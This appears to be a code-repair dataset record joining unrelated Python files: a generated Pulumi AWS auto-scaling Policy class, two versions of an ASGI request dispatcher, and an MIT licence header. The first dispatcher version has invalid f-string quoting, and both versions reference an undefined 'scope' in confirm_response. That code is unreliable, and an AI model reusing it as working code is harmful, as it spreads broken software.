:param pulumi.Input[str] policy_type: The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
:param pulumi.Input[str] resource_id: The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] scalable_dimension: The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] service_namespace: The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']] step_scaling_policy_configuration: Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
:param pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']] target_tracking_scaling_policy_configuration: A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['name'] = name
__props__['policy_type'] = policy_type
if resource_id is None and not opts.urn:
raise TypeError("Missing required property 'resource_id'")
__props__['resource_id'] = resource_id
if scalable_dimension is None and not opts.urn:
raise TypeError("Missing required property 'scalable_dimension'")
__props__['scalable_dimension'] = scalable_dimension
if service_namespace is None and not opts.urn:
raise TypeError("Missing required property 'service_namespace'")
__props__['service_namespace'] = service_namespace
__props__['step_scaling_policy_configuration'] = step_scaling_policy_configuration
__props__['target_tracking_scaling_policy_configuration'] = target_tracking_scaling_policy_configuration
__props__['arn'] = None
super(Policy, __self__).__init__(
'aws:appautoscaling/policy:Policy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
scalable_dimension: Optional[pulumi.Input[str]] = None,
service_namespace: Optional[pulumi.Input[str]] = None,
step_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']]] = None,
target_tracking_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']]] = None) -> 'Policy':
"""
Get an existing Policy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The ARN assigned by AWS to the scaling policy.
:param pulumi.Input[str] name: The name of the policy. Must be between 1 and 255 characters in length.
:param pulumi.Input[str] policy_type: The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
:param pulumi.Input[str] resource_id: The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] scalable_dimension: The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] service_namespace: The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']] step_scaling_policy_configuration: Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
:param pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']] target_tracking_scaling_policy_configuration: A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["arn"] = arn
__props__["name"] = name
__props__["policy_type"] = policy_type
__props__["resource_id"] = resource_id
__props__["scalable_dimension"] = scalable_dimension
__props__["service_namespace"] = service_namespace
__props__["step_scaling_policy_configuration"] = step_scaling_policy_configuration
__props__["target_tracking_scaling_policy_configuration"] = target_tracking_scaling_policy_configuration
return Policy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The ARN assigned by AWS to the scaling policy.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the policy. Must be between 1 and 255 characters in length.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="policyType")
def policy_type(self) -> pulumi.Output[Optional[str]]:
"""
The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
"""
return pulumi.get(self, "policy_type")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Output[str]:
"""
The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter(name="scalableDimension")
def scalable_dimension(self) -> pulumi.Output[str]:
"""
The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "scalable_dimension")
@property
@pulumi.getter(name="serviceNamespace")
def service_namespace(self) -> pulumi.Output[str]:
"""
The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "service_namespace")
@property
@pulumi.getter(name="stepScalingPolicyConfiguration")
def step_scaling_policy_configuration(self) -> pulumi.Output[Optional['outputs.PolicyStepScalingPolicyConfiguration']]:
"""
Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
"""
return pulumi.get(self, "step_scaling_policy_configuration")
@property
@pulumi.getter(name="targetTrackingScalingPolicyConfiguration")
def target_tracking_scaling_policy_configuration(self) -> pulumi.Output[Optional['outputs.PolicyTargetTrackingScalingPolicyConfiguration']]:
"""
A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
return pulumi.get(self, "target_tracking_scaling_policy_configuration")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['Policy']
class Policy(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
scalable_dimension: Optional[pulumi.Input[str]] = None,
service_namespace: Optional[pulumi.Input[str]] = None,
step_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']]] = None,
target_tracking_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Provides an Application AutoScaling Policy resource.
## Example Usage
### DynamoDB Table Autoscaling
```python
import pulumi
import pulumi_aws as aws
dynamodb_table_read_target = aws.appautoscaling.Target("dynamodbTableReadTarget",
max_capacity=100,
min_capacity=5,
resource_id="table/tableName",
scalable_dimension="dynamodb:table:ReadCapacityUnits",
service_namespace="dynamodb")
dynamodb_table_read_policy = aws.appautoscaling.Policy("dynamodbTableReadPolicy",
policy_type="TargetTrackingScaling",
resource_id=dynamodb_table_read_target.resource_id,
scalable_dimension=dynamodb_table_read_target.scalable_dimension,
service_namespace=dynamodb_table_read_target.service_namespace,
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="DynamoDBReadCapacityUtilization",
),
target_value=70,
))
```
### ECS Service Autoscaling
```python
import pulumi
import pulumi_aws as aws
ecs_target = aws.appautoscaling.Target("ecsTarget",
max_capacity=4,
min_capacity=1,
resource_id="service/clusterName/serviceName",
scalable_dimension="ecs:service:DesiredCount",
service_namespace="ecs")
ecs_policy = aws.appautoscaling.Policy("ecsPolicy",
policy_type="StepScaling",
resource_id=ecs_target.resource_id,
scalable_dimension=ecs_target.scalable_dimension,
service_namespace=ecs_target.service_namespace,
step_scaling_policy_configuration=aws.appautoscaling.PolicyStepScalingPolicyConfigurationArgs(
adjustment_type="ChangeInCapacity",
cooldown=60,
metric_aggregation_type="Maximum",
step_adjustments=[{
"metricIntervalUpperBound": 0,
"scaling_adjustment": -1,
}],
))
```
### Preserve desired count when updating an autoscaled ECS Service
```python
import pulumi
import pulumi_aws as aws
ecs_service = aws.ecs.Service("ecsService",
cluster="clusterName",
task_definition="taskDefinitionFamily:1",
desired_count=2)
```
### Aurora Read Replica Autoscaling
```python
import pulumi
import pulumi_aws as aws
replicas_target = aws.appautoscaling.Target("replicasTarget",
service_namespace="rds",
scalable_dimension="rds:cluster:ReadReplicaCount",
resource_id=f"cluster:{aws_rds_cluster['example']['id']}",
min_capacity=1,
max_capacity=15)
replicas_policy = aws.appautoscaling.Policy("replicasPolicy",
service_namespace=replicas_target.service_namespace,
scalable_dimension=replicas_target.scalable_dimension,
resource_id=replicas_target.resource_id,
policy_type="TargetTrackingScaling",
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="RDSReaderAverageCPUUtilization",
),
target_value=75,
scale_in_cooldown=300,
scale_out_cooldown=300,
))
```
### MSK / Kafka Autoscaling
```python
import pulumi
import pulumi_aws as aws
msk_target = aws.appautoscaling.Target("mskTarget",
service_namespace="kafka",
scalable_dimension="kafka:broker-storage:VolumeSize",
resource_id=aws_msk_cluster["example"]["arn"],
min_capacity=1,
max_capacity=8)
targets = aws.appautoscaling.Policy("targets",
service_namespace=msk_target.service_namespace,
scalable_dimension=msk_target.scalable_dimension,
resource_id=msk_target.resource_id,
policy_type="TargetTrackingScaling",
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="KafkaBrokerStorageUtilization",
),
target_value=55,
))
```
## Import
Application AutoScaling Policy can be imported using the `service-namespace` , `resource-id`, `scalable-dimension` and `policy-name` separated by `/`.
```sh
$ pulumi import aws:appautoscaling/policy:Policy test-policy service-namespace/resource-id/scalable-dimension/policy-name
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: The name of the policy. Must be between 1 and 255 characters in length.
:param pulumi.Input[str] policy_type: The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
:param pulumi.Input[str] resource_id: The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] scalable_dimension: The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] service_namespace: The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']] step_scaling_policy_configuration: Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
:param pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']] target_tracking_scaling_policy_configuration: A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['name'] = name
__props__['policy_type'] = policy_type
if resource_id is None and not opts.urn:
raise TypeError("Missing required property 'resource_id'")
__props__['resource_id'] = resource_id
if scalable_dimension is None and not opts.urn:
raise TypeError("Missing required property 'scalable_dimension'")
__props__['scalable_dimension'] = scalable_dimension
if service_namespace is None and not opts.urn:
raise TypeError("Missing required property 'service_namespace'")
__props__['service_namespace'] = service_namespace
__props__['step_scaling_policy_configuration'] = step_scaling_policy_configuration
__props__['target_tracking_scaling_policy_configuration'] = target_tracking_scaling_policy_configuration
__props__['arn'] = None
super(Policy, __self__).__init__(
'aws:appautoscaling/policy:Policy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
scalable_dimension: Optional[pulumi.Input[str]] = None,
service_namespace: Optional[pulumi.Input[str]] = None,
step_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']]] = None,
target_tracking_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']]] = None) -> 'Policy':
"""
Get an existing Policy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The ARN assigned by AWS to the scaling policy.
:param pulumi.Input[str] name: The name of the policy. Must be between 1 and 255 characters in length.
:param pulumi.Input[str] policy_type: The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
:param pulumi.Input[str] resource_id: The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] scalable_dimension: The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] service_namespace: The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']] step_scaling_policy_configuration: Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
:param pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']] target_tracking_scaling_policy_configuration: A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["arn"] = arn
__props__["name"] = name
__props__["policy_type"] = policy_type
__props__["resource_id"] = resource_id
__props__["scalable_dimension"] = scalable_dimension
__props__["service_namespace"] = service_namespace
__props__["step_scaling_policy_configuration"] = step_scaling_policy_configuration
__props__["target_tracking_scaling_policy_configuration"] = target_tracking_scaling_policy_configuration
return Policy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The ARN assigned by AWS to the scaling policy.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the policy. Must be between 1 and 255 characters in length.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="policyType")
def policy_type(self) -> pulumi.Output[Optional[str]]:
"""
The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
"""
return pulumi.get(self, "policy_type")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Output[str]:
"""
The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter(name="scalableDimension")
def scalable_dimension(self) -> pulumi.Output[str]:
"""
The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "scalable_dimension")
@property
@pulumi.getter(name="serviceNamespace")
def service_namespace(self) -> pulumi.Output[str]:
"""
The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "service_namespace")
@property
@pulumi.getter(name="stepScalingPolicyConfiguration")
def step_scaling_policy_configuration(self) -> pulumi.Output[Optional['outputs.PolicyStepScalingPolicyConfiguration']]:
"""
Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
"""
return pulumi.get(self, "step_scaling_policy_configuration")
@property
@pulumi.getter(name="targetTrackingScalingPolicyConfiguration")
def target_tracking_scaling_policy_configuration(self) -> pulumi.Output[Optional['outputs.PolicyTargetTrackingScalingPolicyConfiguration']]:
"""
A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
return pulumi.get(self, "target_tracking_scaling_policy_configuration")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
from .path import DNENode, DummyNode
from .request import Request, DummyRequest
from .response import Response, TextResponse, StaticResponse
from .error import NotResponseError, NoResponseReturnedError, NoMethodError, ResponseError
from .view import View
from queue import Empty as QueueEmpty
import asyncio
class AsgiApplication:
def __init__(self, handler):
self.handler = handler
async def __call__(self, scope, receive, send):
if scope["type"] == "http":
request = await Request.assemble(scope, receive)
## URL -> Node -> View
node, view = await self.get_node_view(request, scope)
if view is not None:
## Node, View -> Queue -> Response
resp_queue = self.view_to_response_queue(request, node, view)
responses = await self.get_responses(resp_queue)
try:
resp = responses[0] # cannot handle more than 1 response yet
except IndexError:
self.handler.logger.error(NoResponseReturnedError(f"No valid response is found when loading '{scope["path"]}'"))
resp = await self.load_error_response("500", request)
else:
resp = await self.load_error_response("500", request)
## Response + checks -> Header, Body -> Send
good_resp = await self.confirm_response(resp, request)
await self.send_response(send, good_resp)
# Logging
if self.handler.setting.print_connection_information:
self.handler.logger.info(self.handler.setting.app_logging_msg(request=request, response=good_resp))
elif scope["type"] == "lifespan":
pass
# Not even HTTP
else:
await self.send_response(send, await self.load_error_response("500", DummyRequest()))
async def get_node_view(self, request, scope):
if len(self.handler.setting.hosts_allowed) == 0 or request.host in self.handler.setting.hosts_allowed:
# Check static url
if scope["path"].find(self.handler.setting.static_url) == 0:
path = scope["path"].split(self.handler.setting.static_url)[1]
async def func(): return StaticResponse(path)
return DummyNode(), View(func)
# Get view from pages
node = self.handler.get_page(scope["path"])
if isinstance(node, DNENode):
view = await self.load_error_view("404")
else:
view = node.views.get(scope["method"])
if view is None:
self.handler.logger.error(NoMethodError(f"There is no {scope["method"]} method for {node.get_full_url_of_self()}"))
view = await self.load_error_view("501")
return node, view
return DummyNode(), await self.load_error_view("bad_host")
def view_to_response_queue(self, request, node, view):
request.set_extra_url(node.kwargs)
node.kwargs = {}
view.set_request(request)
view.set_await_send(self.handler.setting.await_send_mode)
return view()
@staticmethod
async def get_responses(resp_queue):
responses = []
while True:
try:
task = resp_queue.get(block=False)
except QueueEmpty:
break
else:
while not task.done(): await asyncio.sleep(0.001)
r = task.result()
if r is not None: responses.append(r) # ignore None in non-returning functions
return responses
async def confirm_response(self, resp, request):
if not isinstance(resp, Response):
self.handler.logger.warning(NotResponseError(
f"The returning object ({resp}) is not a Response object when loading "{scope["path"]}'"))
resp = TextResponse(str(resp))
try:
resp.set_handler(self.handler)
except ResponseError as e:
if isinstance(e.error_response, StaticResponse):
# Triggered when someone tried to load a static page that does not exist with direct url
resp = await self.load_error_response("404", request)
else:
# idk when it will be triggered. Just leave as a safeguard
resp = await self.load_error_response("502", request)
self.handler.logger.error(e)
return resp
async def load_error_response(self, error_code, request):
view = await self.load_error_view(error_code)
responses = await self.get_responses(self.view_to_response_queue(request, DummyNode(), view))
return responses[0]
async def load_error_view(self, error_code):
node = self.handler.error_pages.get_node(str(error_code))
return node.views.get("GET")
@staticmethod
async def send_response(send, resp):
await send(resp.head)
await send(resp.body)
if resp.callback_be_awaited:
await resp.callback()
else:
resp.callback()
| from .path import DNENode, DummyNode
from .request import Request, DummyRequest
from .response import Response, TextResponse, StaticResponse
from .error import NotResponseError, NoResponseReturnedError, NoMethodError, ResponseError
from .view import View
from queue import Empty as QueueEmpty
import asyncio
class AsgiApplication:
def __init__(self, handler):
self.handler = handler
async def __call__(self, scope, receive, send):
if scope["type"] == "http":
request = await Request.assemble(scope, receive)
## URL -> Node -> View
node, view = await self.get_node_view(request, scope)
if view is not None:
## Node, View -> Queue -> Response
resp_queue = self.view_to_response_queue(request, node, view)
responses = await self.get_responses(resp_queue)
try:
resp = responses[0] # cannot handle more than 1 response yet
except IndexError:
self.handler.logger.error(NoResponseReturnedError(f"No valid response is found when loading '{scope['path']}'"))
resp = await self.load_error_response("500", request)
else:
resp = await self.load_error_response("500", request)
## Response + checks -> Header, Body -> Send
good_resp = await self.confirm_response(resp, request)
await self.send_response(send, good_resp)
# Logging
if self.handler.setting.print_connection_information:
self.handler.logger.info(self.handler.setting.app_logging_msg(request=request, response=good_resp))
elif scope["type"] == "lifespan":
pass
# Not even HTTP
else:
await self.send_response(send, await self.load_error_response("500", DummyRequest()))
async def get_node_view(self, request, scope):
if len(self.handler.setting.hosts_allowed) == 0 or request.host in self.handler.setting.hosts_allowed:
# Check static url
if scope["path"].find(self.handler.setting.static_url) == 0:
path = scope["path"].split(self.handler.setting.static_url)[1]
async def func(): return StaticResponse(path)
return DummyNode(), View(func)
# Get view from pages
node = self.handler.get_page(scope["path"])
if isinstance(node, DNENode):
view = await self.load_error_view("404")
else:
view = node.views.get(scope["method"])
if view is None:
self.handler.logger.error(NoMethodError(f"There is no {scope['method']} method for {node.get_full_url_of_self()}"))
view = await self.load_error_view("501")
return node, view
return DummyNode(), await self.load_error_view("bad_host")
def view_to_response_queue(self, request, node, view):
request.set_extra_url(node.kwargs)
node.kwargs = {}
view.set_request(request)
view.set_await_send(self.handler.setting.await_send_mode)
return view()
@staticmethod
async def get_responses(resp_queue):
responses = []
while True:
try:
task = resp_queue.get(block=False)
except QueueEmpty:
break
else:
while not task.done(): await asyncio.sleep(0.001)
r = task.result()
if r is not None: responses.append(r) # ignore None in non-returning functions
return responses
async def confirm_response(self, resp, request):
if not isinstance(resp, Response):
self.handler.logger.warning(NotResponseError(
f"The returning object ({resp}) is not a Response object when loading '{scope['path']}'"))
resp = TextResponse(str(resp))
try:
resp.set_handler(self.handler)
except ResponseError as e:
if isinstance(e.error_response, StaticResponse):
# Triggered when someone tried to load a static page that does not exist with direct url
resp = await self.load_error_response("404", request)
else:
# idk when it will be triggered. Just leave as a safeguard
resp = await self.load_error_response("502", request)
self.handler.logger.error(e)
return resp
async def load_error_response(self, error_code, request):
view = await self.load_error_view(error_code)
responses = await self.get_responses(self.view_to_response_queue(request, DummyNode(), view))
return responses[0]
async def load_error_view(self, error_code):
node = self.handler.error_pages.get_node(str(error_code))
return node.views.get("GET")
@staticmethod
async def send_response(send, resp):
await send(resp.head)
await send(resp.body)
if resp.callback_be_awaited:
await resp.callback()
else:
resp.callback()
|
"""
MIT License
Copyright (c) 2020 GamingGeek
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
